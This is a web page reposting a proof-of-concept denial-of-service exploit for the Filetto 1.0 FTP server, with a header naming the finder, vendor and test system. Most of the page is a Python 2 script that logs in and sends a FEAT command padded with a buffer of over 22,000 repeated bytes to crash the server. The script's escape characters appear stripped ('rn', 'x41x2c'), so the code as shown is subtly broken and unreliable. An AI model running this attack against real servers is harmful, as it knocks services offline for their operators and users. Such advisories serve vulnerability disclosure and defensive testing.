Filetto 1.0 – ‘FEAT’ Denial of Service (PoC) – Digitalmunition




Exploit/Advisories 1589633036_spider-orange.png

Published on May 22nd, 2020 📆 | 6492 Views ⚑

0

Filetto 1.0 – ‘FEAT’ Denial of Service (PoC)

# Exploit Title: Filetto 1.0 - 'FEAT' Denial of Service (PoC) 
# Date: 2020-05-13
# Found by: Alvaro J. Gene (Socket_0x03)
# Vendor Homepage: http://www.utillyty.eu
# Software Link: https://sourceforge.net/projects/filetto
# Vulnerable Application: Filetto
# Version: 1.0 (last version. Updated: 01/31/2020)
# Server: FTP Server
# Vulnerable Command: FEAT
# Tested on: Windows 7 SP1


====================================================================================================
======================== [ Filetto v1.0 - 'FEAT' Denial of Service (PoC) ] =========================
====================================================================================================


from socket import *

host = "192.168.0.14"
port = 2021
username = "Socket_0x03"
password = "password"

s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)

s.send("USER %srn" % (username))
print s.recv(1024)

s.send("PASS %srn" % (password))
print s.recv(1024)

buffer = "FEAT "
buffer += "x41x2c" * 11008
buffer += "rn"

s.send(buffer)
print s.recv(1024)

s.close()
            

Source link

Tagged with:



Leave a Reply

Your email address will not be published. Required fields are marked *


loading...